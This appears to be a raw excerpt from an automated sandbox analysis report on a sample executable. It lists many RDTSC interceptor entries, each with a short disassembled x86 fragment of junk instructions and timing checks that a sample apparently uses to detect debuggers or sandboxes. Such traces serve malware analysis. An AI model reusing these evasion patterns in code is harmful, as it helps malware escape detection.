                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C64 second address: 500C83 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4EF0C09E1Ch 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C83 second address: 500C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C89 second address: 500C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C8D second address: 500C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500E18 second address: 500E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500E1D second address: 500E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4EF0C79895h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50564A second address: 505650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505650 second address: 505659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A19 second address: 505A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A29 second address: 505A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79899h 0x00000007 jmp 00007F4EF0C7988Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F4EF0C79886h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A61 second address: 505A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A65 second address: 505A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9EF2 second address: 4A9EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9EF6 second address: 4A9F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4EF0C7988Ah 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 push esi 0x00000016 js 00007F4EF0C79886h 0x0000001c pop esi 0x0000001d popad 0x0000001e nop 0x0000001f call 00007F4EF0C7988Eh 0x00000024 mov ecx, dword ptr [ebp+122D3B47h] 0x0000002a pop ecx 0x0000002b mov ebx, dword ptr [ebp+12484F98h] 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F4EF0C79888h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b stc 0x0000004c add eax, ebx 0x0000004e jmp 00007F4EF0C7988Dh 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnc 00007F4EF0C7988Ch 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9F7C second address: 4A9FBF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F4EF0C09E18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 and dx, 2867h 0x0000002a push 00000004h 0x0000002c jmp 00007F4EF0C09E1Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9FBF second address: 4A9FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 506016 second address: 50601A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50601A second address: 506054 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F4EF0C79886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F4EF0C79893h 0x00000015 jng 00007F4EF0C79886h 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jmp 00007F4EF0C7988Ch 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 506054 second address: 506066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4EF0C09E16h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 506066 second address: 506070 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4EF0C79886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DA8C second address: 50DA97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DA97 second address: 50DA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DA9B second address: 50DAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DAA1 second address: 50DAA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DAA6 second address: 50DAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4EF0C09E29h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50E33D second address: 50E347 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4EF0C79886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50E347 second address: 50E370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4EF0C09E26h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F4EF0C09E16h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50EC02 second address: 50EC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50EC06 second address: 50EC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50F466 second address: 50F488 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4EF0C798A4h 0x00000008 jmp 00007F4EF0C79898h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5138AB second address: 5138BA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4EF0C09E16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5138BA second address: 5138BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5129B0 second address: 5129B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512C9C second address: 512CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CA2 second address: 512CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CA6 second address: 512CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CAA second address: 512CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4EF0C09E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F4EF0C09E25h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CCF second address: 512CDE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5130F4 second address: 513112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F4EF0C09E22h 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 513112 second address: 513127 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79888h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007F4EF0C79886h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 513412 second address: 51341D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51341D second address: 513421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 513584 second address: 513588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51826D second address: 518280 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4EF0C79888h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 518280 second address: 518285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 460244 second address: 460248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 460248 second address: 46024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520A36 second address: 520A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4EF0C79886h 0x00000009 jmp 00007F4EF0C7988Eh 0x0000000e popad 0x0000000f jmp 00007F4EF0C79891h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c jbe 00007F4EF0C7988Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520A6F second address: 520A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520A73 second address: 520A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C79892h 0x00000008 jmp 00007F4EF0C7988Fh 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51EE41 second address: 51EE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51EE45 second address: 51EE4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51EE4B second address: 51EE60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C09E20h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51F2BC second address: 51F2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51F2C6 second address: 51F2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4EF0C09E22h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51F2E0 second address: 51F2E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51FA95 second address: 51FA9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5201CB second address: 5201E1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4EF0C79888h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F4EF0C798D5h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5201E1 second address: 5201FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E28h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5201FD second address: 520201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520201 second address: 52020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 52020D second address: 520213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 522E87 second address: 522E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 52862B second address: 528639 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 528639 second address: 52863D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 52863D second address: 528643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46A36C second address: 46A38E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F4EF0C09E27h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 45E64C second address: 45E651 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 45E651 second address: 45E657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 45E657 second address: 45E67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F4EF0C79886h 0x00000010 jnc 00007F4EF0C79886h 0x00000016 jnp 00007F4EF0C79886h 0x0000001c jp 00007F4EF0C79886h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53939E second address: 5393AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4EF0C09E16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53FF37 second address: 53FF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007F4EF0C7988Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53FF4C second address: 53FF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F4EF0C09E16h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53FF59 second address: 53FF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548850 second address: 548856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548856 second address: 548861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548861 second address: 548865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548865 second address: 548869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548869 second address: 548879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4EF0C09E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5486E6 second address: 5486FF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4EF0C79892h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5486FF second address: 548705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548705 second address: 548718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4EF0C7989Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548718 second address: 548724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 54FF4F second address: 54FF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4EF0C79896h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c ja 00007F4EF0C798A3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 54FF76 second address: 54FF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5573C7 second address: 5573E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4EF0C79888h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4EF0C7988Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 564DA0 second address: 564DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 564DA4 second address: 564DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 564DAA second address: 564DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4EF0C09E16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 571A1D second address: 571A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79892h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 571A34 second address: 571A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C09E21h 0x00000009 jmp 00007F4EF0C09E1Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 587315 second address: 587333 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79886h 0x00000008 jmp 00007F4EF0C79891h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
